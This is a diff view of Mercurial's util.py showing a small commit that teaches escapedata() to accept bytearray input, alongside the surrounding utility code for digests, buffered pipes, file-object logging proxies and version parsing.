##// END OF EJS Templates
util: teach escapedata() about bytearray...
Gregory Szorc -
r36647:c98d1c67 default
parent child Browse files
Show More
@@ -1,4042 +1,4045 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 # disable Python's problematic floating point timestamps (issue4836)
180 180 # (Python hypocritically says you shouldn't change this behavior in
181 181 # libraries, and sure enough Mercurial is not a library.)
182 182 os.stat_float_times(False)
183 183
184 184 def safehasattr(thing, attr):
185 185 return getattr(thing, attr, _notset) is not _notset
186 186
187 187 def _rapply(f, xs):
188 188 if xs is None:
189 189 # assume None means non-value of optional data
190 190 return xs
191 191 if isinstance(xs, (list, set, tuple)):
192 192 return type(xs)(_rapply(f, x) for x in xs)
193 193 if isinstance(xs, dict):
194 194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 195 return f(xs)
196 196
197 197 def rapply(f, xs):
198 198 """Apply function recursively to every item preserving the data structure
199 199
200 200 >>> def f(x):
201 201 ... return 'f(%s)' % x
202 202 >>> rapply(f, None) is None
203 203 True
204 204 >>> rapply(f, 'a')
205 205 'f(a)'
206 206 >>> rapply(f, {'a'}) == {'f(a)'}
207 207 True
208 208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 210
211 211 >>> xs = [object()]
212 212 >>> rapply(pycompat.identity, xs) is xs
213 213 True
214 214 """
215 215 if f is pycompat.identity:
216 216 # fast path mainly for py2
217 217 return xs
218 218 return _rapply(f, xs)
219 219
220 220 def bytesinput(fin, fout, *args, **kwargs):
221 221 sin, sout = sys.stdin, sys.stdout
222 222 try:
223 223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 225 finally:
226 226 sys.stdin, sys.stdout = sin, sout
227 227
228 228 def bitsfrom(container):
229 229 bits = 0
230 230 for bit in container:
231 231 bits |= bit
232 232 return bits
233 233
234 234 # python 2.6 still have deprecation warning enabled by default. We do not want
235 235 # to display anything to standard user so detect if we are running test and
236 236 # only use python deprecation warning in this case.
237 237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 238 if _dowarn:
239 239 # explicitly unfilter our warning for python 2.7
240 240 #
241 241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 248 if _dowarn and pycompat.ispy3:
249 249 # silence warning emitted by passing user string to re.sub()
250 250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
251 251 r'mercurial')
252 252
253 253 def nouideprecwarn(msg, version, stacklevel=1):
254 254 """Issue an python native deprecation warning
255 255
256 256 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
257 257 """
258 258 if _dowarn:
259 259 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
260 260 " update your code.)") % version
261 261 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
262 262
263 263 DIGESTS = {
264 264 'md5': hashlib.md5,
265 265 'sha1': hashlib.sha1,
266 266 'sha512': hashlib.sha512,
267 267 }
268 268 # List of digest types from strongest to weakest
269 269 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
272 272 assert k in DIGESTS
273 273
274 274 class digester(object):
275 275 """helper to compute digests.
276 276
277 277 This helper can be used to compute one or more digests given their name.
278 278
279 279 >>> d = digester([b'md5', b'sha1'])
280 280 >>> d.update(b'foo')
281 281 >>> [k for k in sorted(d)]
282 282 ['md5', 'sha1']
283 283 >>> d[b'md5']
284 284 'acbd18db4cc2f85cedef654fccc4a4d8'
285 285 >>> d[b'sha1']
286 286 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
287 287 >>> digester.preferred([b'md5', b'sha1'])
288 288 'sha1'
289 289 """
290 290
291 291 def __init__(self, digests, s=''):
292 292 self._hashes = {}
293 293 for k in digests:
294 294 if k not in DIGESTS:
295 295 raise Abort(_('unknown digest type: %s') % k)
296 296 self._hashes[k] = DIGESTS[k]()
297 297 if s:
298 298 self.update(s)
299 299
300 300 def update(self, data):
301 301 for h in self._hashes.values():
302 302 h.update(data)
303 303
304 304 def __getitem__(self, key):
305 305 if key not in DIGESTS:
306 306 raise Abort(_('unknown digest type: %s') % k)
307 307 return nodemod.hex(self._hashes[key].digest())
308 308
309 309 def __iter__(self):
310 310 return iter(self._hashes)
311 311
312 312 @staticmethod
313 313 def preferred(supported):
314 314 """returns the strongest digest type in both supported and DIGESTS."""
315 315
316 316 for k in DIGESTS_BY_STRENGTH:
317 317 if k in supported:
318 318 return k
319 319 return None
320 320
321 321 class digestchecker(object):
322 322 """file handle wrapper that additionally checks content against a given
323 323 size and digests.
324 324
325 325 d = digestchecker(fh, size, {'md5': '...'})
326 326
327 327 When multiple digests are given, all of them are validated.
328 328 """
329 329
330 330 def __init__(self, fh, size, digests):
331 331 self._fh = fh
332 332 self._size = size
333 333 self._got = 0
334 334 self._digests = dict(digests)
335 335 self._digester = digester(self._digests.keys())
336 336
337 337 def read(self, length=-1):
338 338 content = self._fh.read(length)
339 339 self._digester.update(content)
340 340 self._got += len(content)
341 341 return content
342 342
343 343 def validate(self):
344 344 if self._size != self._got:
345 345 raise Abort(_('size mismatch: expected %d, got %d') %
346 346 (self._size, self._got))
347 347 for k, v in self._digests.items():
348 348 if v != self._digester[k]:
349 349 # i18n: first parameter is a digest name
350 350 raise Abort(_('%s mismatch: expected %s, got %s') %
351 351 (k, v, self._digester[k]))
352 352
353 353 try:
354 354 buffer = buffer
355 355 except NameError:
356 356 def buffer(sliceable, offset=0, length=None):
357 357 if length is not None:
358 358 return memoryview(sliceable)[offset:offset + length]
359 359 return memoryview(sliceable)[offset:]
360 360
361 361 closefds = pycompat.isposix
362 362
363 363 _chunksize = 4096
364 364
365 365 class bufferedinputpipe(object):
366 366 """a manually buffered input pipe
367 367
368 368 Python will not let us use buffered IO and lazy reading with 'polling' at
369 369 the same time. We cannot probe the buffer state and select will not detect
370 370 that data are ready to read if they are already buffered.
371 371
372 372 This class let us work around that by implementing its own buffering
373 373 (allowing efficient readline) while offering a way to know if the buffer is
374 374 empty from the output (allowing collaboration of the buffer with polling).
375 375
376 376 This class lives in the 'util' module because it makes use of the 'os'
377 377 module from the python stdlib.
378 378 """
379 379 def __new__(cls, fh):
380 380 # If we receive a fileobjectproxy, we need to use a variation of this
381 381 # class that notifies observers about activity.
382 382 if isinstance(fh, fileobjectproxy):
383 383 cls = observedbufferedinputpipe
384 384
385 385 return super(bufferedinputpipe, cls).__new__(cls)
386 386
387 387 def __init__(self, input):
388 388 self._input = input
389 389 self._buffer = []
390 390 self._eof = False
391 391 self._lenbuf = 0
392 392
393 393 @property
394 394 def hasbuffer(self):
395 395 """True is any data is currently buffered
396 396
397 397 This will be used externally a pre-step for polling IO. If there is
398 398 already data then no polling should be set in place."""
399 399 return bool(self._buffer)
400 400
401 401 @property
402 402 def closed(self):
403 403 return self._input.closed
404 404
405 405 def fileno(self):
406 406 return self._input.fileno()
407 407
408 408 def close(self):
409 409 return self._input.close()
410 410
411 411 def read(self, size):
412 412 while (not self._eof) and (self._lenbuf < size):
413 413 self._fillbuffer()
414 414 return self._frombuffer(size)
415 415
416 416 def readline(self, *args, **kwargs):
417 417 if 1 < len(self._buffer):
418 418 # this should not happen because both read and readline end with a
419 419 # _frombuffer call that collapse it.
420 420 self._buffer = [''.join(self._buffer)]
421 421 self._lenbuf = len(self._buffer[0])
422 422 lfi = -1
423 423 if self._buffer:
424 424 lfi = self._buffer[-1].find('\n')
425 425 while (not self._eof) and lfi < 0:
426 426 self._fillbuffer()
427 427 if self._buffer:
428 428 lfi = self._buffer[-1].find('\n')
429 429 size = lfi + 1
430 430 if lfi < 0: # end of file
431 431 size = self._lenbuf
432 432 elif 1 < len(self._buffer):
433 433 # we need to take previous chunks into account
434 434 size += self._lenbuf - len(self._buffer[-1])
435 435 return self._frombuffer(size)
436 436
437 437 def _frombuffer(self, size):
438 438 """return at most 'size' data from the buffer
439 439
440 440 The data are removed from the buffer."""
441 441 if size == 0 or not self._buffer:
442 442 return ''
443 443 buf = self._buffer[0]
444 444 if 1 < len(self._buffer):
445 445 buf = ''.join(self._buffer)
446 446
447 447 data = buf[:size]
448 448 buf = buf[len(data):]
449 449 if buf:
450 450 self._buffer = [buf]
451 451 self._lenbuf = len(buf)
452 452 else:
453 453 self._buffer = []
454 454 self._lenbuf = 0
455 455 return data
456 456
457 457 def _fillbuffer(self):
458 458 """read data to the buffer"""
459 459 data = os.read(self._input.fileno(), _chunksize)
460 460 if not data:
461 461 self._eof = True
462 462 else:
463 463 self._lenbuf += len(data)
464 464 self._buffer.append(data)
465 465
466 466 return data
467 467
468 468 def mmapread(fp):
469 469 try:
470 470 fd = getattr(fp, 'fileno', lambda: fp)()
471 471 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
472 472 except ValueError:
473 473 # Empty files cannot be mmapped, but mmapread should still work. Check
474 474 # if the file is empty, and if so, return an empty buffer.
475 475 if os.fstat(fd).st_size == 0:
476 476 return ''
477 477 raise
478 478
479 479 def popen2(cmd, env=None, newlines=False):
480 480 # Setting bufsize to -1 lets the system decide the buffer size.
481 481 # The default for bufsize is 0, meaning unbuffered. This leads to
482 482 # poor performance on Mac OS X: http://bugs.python.org/issue4194
483 483 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
484 484 close_fds=closefds,
485 485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 486 universal_newlines=newlines,
487 487 env=env)
488 488 return p.stdin, p.stdout
489 489
490 490 def popen3(cmd, env=None, newlines=False):
491 491 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
492 492 return stdin, stdout, stderr
493 493
494 494 def popen4(cmd, env=None, newlines=False, bufsize=-1):
495 495 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
496 496 close_fds=closefds,
497 497 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
498 498 stderr=subprocess.PIPE,
499 499 universal_newlines=newlines,
500 500 env=env)
501 501 return p.stdin, p.stdout, p.stderr, p
502 502
503 503 class fileobjectproxy(object):
504 504 """A proxy around file objects that tells a watcher when events occur.
505 505
506 506 This type is intended to only be used for testing purposes. Think hard
507 507 before using it in important code.
508 508 """
509 509 __slots__ = (
510 510 r'_orig',
511 511 r'_observer',
512 512 )
513 513
514 514 def __init__(self, fh, observer):
515 515 object.__setattr__(self, r'_orig', fh)
516 516 object.__setattr__(self, r'_observer', observer)
517 517
518 518 def __getattribute__(self, name):
519 519 ours = {
520 520 r'_observer',
521 521
522 522 # IOBase
523 523 r'close',
524 524 # closed if a property
525 525 r'fileno',
526 526 r'flush',
527 527 r'isatty',
528 528 r'readable',
529 529 r'readline',
530 530 r'readlines',
531 531 r'seek',
532 532 r'seekable',
533 533 r'tell',
534 534 r'truncate',
535 535 r'writable',
536 536 r'writelines',
537 537 # RawIOBase
538 538 r'read',
539 539 r'readall',
540 540 r'readinto',
541 541 r'write',
542 542 # BufferedIOBase
543 543 # raw is a property
544 544 r'detach',
545 545 # read defined above
546 546 r'read1',
547 547 # readinto defined above
548 548 # write defined above
549 549 }
550 550
551 551 # We only observe some methods.
552 552 if name in ours:
553 553 return object.__getattribute__(self, name)
554 554
555 555 return getattr(object.__getattribute__(self, r'_orig'), name)
556 556
557 557 def __delattr__(self, name):
558 558 return delattr(object.__getattribute__(self, r'_orig'), name)
559 559
560 560 def __setattr__(self, name, value):
561 561 return setattr(object.__getattribute__(self, r'_orig'), name, value)
562 562
563 563 def __iter__(self):
564 564 return object.__getattribute__(self, r'_orig').__iter__()
565 565
566 566 def _observedcall(self, name, *args, **kwargs):
567 567 # Call the original object.
568 568 orig = object.__getattribute__(self, r'_orig')
569 569 res = getattr(orig, name)(*args, **kwargs)
570 570
571 571 # Call a method on the observer of the same name with arguments
572 572 # so it can react, log, etc.
573 573 observer = object.__getattribute__(self, r'_observer')
574 574 fn = getattr(observer, name, None)
575 575 if fn:
576 576 fn(res, *args, **kwargs)
577 577
578 578 return res
579 579
580 580 def close(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'close', *args, **kwargs)
583 583
584 584 def fileno(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'fileno', *args, **kwargs)
587 587
588 588 def flush(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'flush', *args, **kwargs)
591 591
592 592 def isatty(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'isatty', *args, **kwargs)
595 595
596 596 def readable(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readable', *args, **kwargs)
599 599
600 600 def readline(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readline', *args, **kwargs)
603 603
604 604 def readlines(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'readlines', *args, **kwargs)
607 607
608 608 def seek(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seek', *args, **kwargs)
611 611
612 612 def seekable(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'seekable', *args, **kwargs)
615 615
616 616 def tell(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'tell', *args, **kwargs)
619 619
620 620 def truncate(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'truncate', *args, **kwargs)
623 623
624 624 def writable(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writable', *args, **kwargs)
627 627
628 628 def writelines(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'writelines', *args, **kwargs)
631 631
632 632 def read(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'read', *args, **kwargs)
635 635
636 636 def readall(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readall', *args, **kwargs)
639 639
640 640 def readinto(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'readinto', *args, **kwargs)
643 643
644 644 def write(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'write', *args, **kwargs)
647 647
648 648 def detach(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'detach', *args, **kwargs)
651 651
652 652 def read1(self, *args, **kwargs):
653 653 return object.__getattribute__(self, r'_observedcall')(
654 654 r'read1', *args, **kwargs)
655 655
656 656 class observedbufferedinputpipe(bufferedinputpipe):
657 657 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
658 658
659 659 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
660 660 bypass ``fileobjectproxy``. Because of this, we need to make
661 661 ``bufferedinputpipe`` aware of these operations.
662 662
663 663 This variation of ``bufferedinputpipe`` can notify observers about
664 664 ``os.read()`` events. It also re-publishes other events, such as
665 665 ``read()`` and ``readline()``.
666 666 """
667 667 def _fillbuffer(self):
668 668 res = super(observedbufferedinputpipe, self)._fillbuffer()
669 669
670 670 fn = getattr(self._input._observer, r'osread', None)
671 671 if fn:
672 672 fn(res, _chunksize)
673 673
674 674 return res
675 675
676 676 # We use different observer methods because the operation isn't
677 677 # performed on the actual file object but on us.
678 678 def read(self, size):
679 679 res = super(observedbufferedinputpipe, self).read(size)
680 680
681 681 fn = getattr(self._input._observer, r'bufferedread', None)
682 682 if fn:
683 683 fn(res, size)
684 684
685 685 return res
686 686
687 687 def readline(self, *args, **kwargs):
688 688 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
689 689
690 690 fn = getattr(self._input._observer, r'bufferedreadline', None)
691 691 if fn:
692 692 fn(res)
693 693
694 694 return res
695 695
696 696 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
697 697 DATA_ESCAPE_MAP.update({
698 698 b'\\': b'\\\\',
699 699 b'\r': br'\r',
700 700 b'\n': br'\n',
701 701 })
702 702 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
703 703
704 704 def escapedata(s):
705 if isinstance(s, bytearray):
706 s = bytes(s)
707
705 708 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
706 709
707 710 class fileobjectobserver(object):
708 711 """Logs file object activity."""
709 712 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
710 713 self.fh = fh
711 714 self.name = name
712 715 self.logdata = logdata
713 716 self.reads = reads
714 717 self.writes = writes
715 718
716 719 def _writedata(self, data):
717 720 if not self.logdata:
718 721 self.fh.write('\n')
719 722 return
720 723
721 724 # Simple case writes all data on a single line.
722 725 if b'\n' not in data:
723 726 self.fh.write(': %s\n' % escapedata(data))
724 727 return
725 728
726 729 # Data with newlines is written to multiple lines.
727 730 self.fh.write(':\n')
728 731 lines = data.splitlines(True)
729 732 for line in lines:
730 733 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
731 734
732 735 def read(self, res, size=-1):
733 736 if not self.reads:
734 737 return
735 738 # Python 3 can return None from reads at EOF instead of empty strings.
736 739 if res is None:
737 740 res = ''
738 741
739 742 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
740 743 self._writedata(res)
741 744
742 745 def readline(self, res, limit=-1):
743 746 if not self.reads:
744 747 return
745 748
746 749 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
747 750 self._writedata(res)
748 751
749 752 def write(self, res, data):
750 753 if not self.writes:
751 754 return
752 755
753 756 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
754 757 self._writedata(data)
755 758
756 759 def flush(self, res):
757 760 if not self.writes:
758 761 return
759 762
760 763 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
761 764
762 765 # For observedbufferedinputpipe.
763 766 def bufferedread(self, res, size):
764 767 self.fh.write('%s> bufferedread(%d) -> %d' % (
765 768 self.name, size, len(res)))
766 769 self._writedata(res)
767 770
768 771 def bufferedreadline(self, res):
769 772 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
770 773 self._writedata(res)
771 774
772 775 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
773 776 logdata=False):
774 777 """Turn a file object into a logging file object."""
775 778
776 779 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
777 780 logdata=logdata)
778 781 return fileobjectproxy(fh, observer)
779 782
780 783 def version():
781 784 """Return version information if available."""
782 785 try:
783 786 from . import __version__
784 787 return __version__.version
785 788 except ImportError:
786 789 return 'unknown'
787 790
788 791 def versiontuple(v=None, n=4):
789 792 """Parses a Mercurial version string into an N-tuple.
790 793
791 794 The version string to be parsed is specified with the ``v`` argument.
792 795 If it isn't defined, the current Mercurial version string will be parsed.
793 796
794 797 ``n`` can be 2, 3, or 4. Here is how some version strings map to
795 798 returned values:
796 799
797 800 >>> v = b'3.6.1+190-df9b73d2d444'
798 801 >>> versiontuple(v, 2)
799 802 (3, 6)
800 803 >>> versiontuple(v, 3)
801 804 (3, 6, 1)
802 805 >>> versiontuple(v, 4)
803 806 (3, 6, 1, '190-df9b73d2d444')
804 807
805 808 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
806 809 (3, 6, 1, '190-df9b73d2d444+20151118')
807 810
808 811 >>> v = b'3.6'
809 812 >>> versiontuple(v, 2)
810 813 (3, 6)
811 814 >>> versiontuple(v, 3)
812 815 (3, 6, None)
813 816 >>> versiontuple(v, 4)
814 817 (3, 6, None, None)
815 818
816 819 >>> v = b'3.9-rc'
817 820 >>> versiontuple(v, 2)
818 821 (3, 9)
819 822 >>> versiontuple(v, 3)
820 823 (3, 9, None)
821 824 >>> versiontuple(v, 4)
822 825 (3, 9, None, 'rc')
823 826
824 827 >>> v = b'3.9-rc+2-02a8fea4289b'
825 828 >>> versiontuple(v, 2)
826 829 (3, 9)
827 830 >>> versiontuple(v, 3)
828 831 (3, 9, None)
829 832 >>> versiontuple(v, 4)
830 833 (3, 9, None, 'rc+2-02a8fea4289b')
831 834 """
832 835 if not v:
833 836 v = version()
834 837 parts = remod.split('[\+-]', v, 1)
835 838 if len(parts) == 1:
836 839 vparts, extra = parts[0], None
837 840 else:
838 841 vparts, extra = parts
839 842
840 843 vints = []
841 844 for i in vparts.split('.'):
842 845 try:
843 846 vints.append(int(i))
844 847 except ValueError:
845 848 break
846 849 # (3, 6) -> (3, 6, None)
847 850 while len(vints) < 3:
848 851 vints.append(None)
849 852
850 853 if n == 2:
851 854 return (vints[0], vints[1])
852 855 if n == 3:
853 856 return (vints[0], vints[1], vints[2])
854 857 if n == 4:
855 858 return (vints[0], vints[1], vints[2], extra)
856 859
857 860 def cachefunc(func):
858 861 '''cache the result of function calls'''
859 862 # XXX doesn't handle keywords args
860 863 if func.__code__.co_argcount == 0:
861 864 cache = []
862 865 def f():
863 866 if len(cache) == 0:
864 867 cache.append(func())
865 868 return cache[0]
866 869 return f
867 870 cache = {}
868 871 if func.__code__.co_argcount == 1:
869 872 # we gain a small amount of time because
870 873 # we don't need to pack/unpack the list
871 874 def f(arg):
872 875 if arg not in cache:
873 876 cache[arg] = func(arg)
874 877 return cache[arg]
875 878 else:
876 879 def f(*args):
877 880 if args not in cache:
878 881 cache[args] = func(*args)
879 882 return cache[args]
880 883
881 884 return f
882 885
883 886 class cow(object):
884 887 """helper class to make copy-on-write easier
885 888
886 889 Call preparewrite before doing any writes.
887 890 """
888 891
889 892 def preparewrite(self):
890 893 """call this before writes, return self or a copied new object"""
891 894 if getattr(self, '_copied', 0):
892 895 self._copied -= 1
893 896 return self.__class__(self)
894 897 return self
895 898
896 899 def copy(self):
897 900 """always do a cheap copy"""
898 901 self._copied = getattr(self, '_copied', 0) + 1
899 902 return self
900 903
901 904 class sortdict(collections.OrderedDict):
902 905 '''a simple sorted dictionary
903 906
904 907 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
905 908 >>> d2 = d1.copy()
906 909 >>> d2
907 910 sortdict([('a', 0), ('b', 1)])
908 911 >>> d2.update([(b'a', 2)])
909 912 >>> list(d2.keys()) # should still be in last-set order
910 913 ['b', 'a']
911 914 '''
912 915
913 916 def __setitem__(self, key, value):
914 917 if key in self:
915 918 del self[key]
916 919 super(sortdict, self).__setitem__(key, value)
917 920
918 921 if pycompat.ispypy:
919 922 # __setitem__() isn't called as of PyPy 5.8.0
920 923 def update(self, src):
921 924 if isinstance(src, dict):
922 925 src = src.iteritems()
923 926 for k, v in src:
924 927 self[k] = v
925 928
926 929 class cowdict(cow, dict):
927 930 """copy-on-write dict
928 931
929 932 Be sure to call d = d.preparewrite() before writing to d.
930 933
931 934 >>> a = cowdict()
932 935 >>> a is a.preparewrite()
933 936 True
934 937 >>> b = a.copy()
935 938 >>> b is a
936 939 True
937 940 >>> c = b.copy()
938 941 >>> c is a
939 942 True
940 943 >>> a = a.preparewrite()
941 944 >>> b is a
942 945 False
943 946 >>> a is a.preparewrite()
944 947 True
945 948 >>> c = c.preparewrite()
946 949 >>> b is c
947 950 False
948 951 >>> b is b.preparewrite()
949 952 True
950 953 """
951 954
952 955 class cowsortdict(cow, sortdict):
953 956 """copy-on-write sortdict
954 957
955 958 Be sure to call d = d.preparewrite() before writing to d.
956 959 """
957 960
958 961 class transactional(object):
959 962 """Base class for making a transactional type into a context manager."""
960 963 __metaclass__ = abc.ABCMeta
961 964
962 965 @abc.abstractmethod
963 966 def close(self):
964 967 """Successfully closes the transaction."""
965 968
966 969 @abc.abstractmethod
967 970 def release(self):
968 971 """Marks the end of the transaction.
969 972
970 973 If the transaction has not been closed, it will be aborted.
971 974 """
972 975
973 976 def __enter__(self):
974 977 return self
975 978
976 979 def __exit__(self, exc_type, exc_val, exc_tb):
977 980 try:
978 981 if exc_type is None:
979 982 self.close()
980 983 finally:
981 984 self.release()
982 985
983 986 @contextlib.contextmanager
984 987 def acceptintervention(tr=None):
985 988 """A context manager that closes the transaction on InterventionRequired
986 989
987 990 If no transaction was provided, this simply runs the body and returns
988 991 """
989 992 if not tr:
990 993 yield
991 994 return
992 995 try:
993 996 yield
994 997 tr.close()
995 998 except error.InterventionRequired:
996 999 tr.close()
997 1000 raise
998 1001 finally:
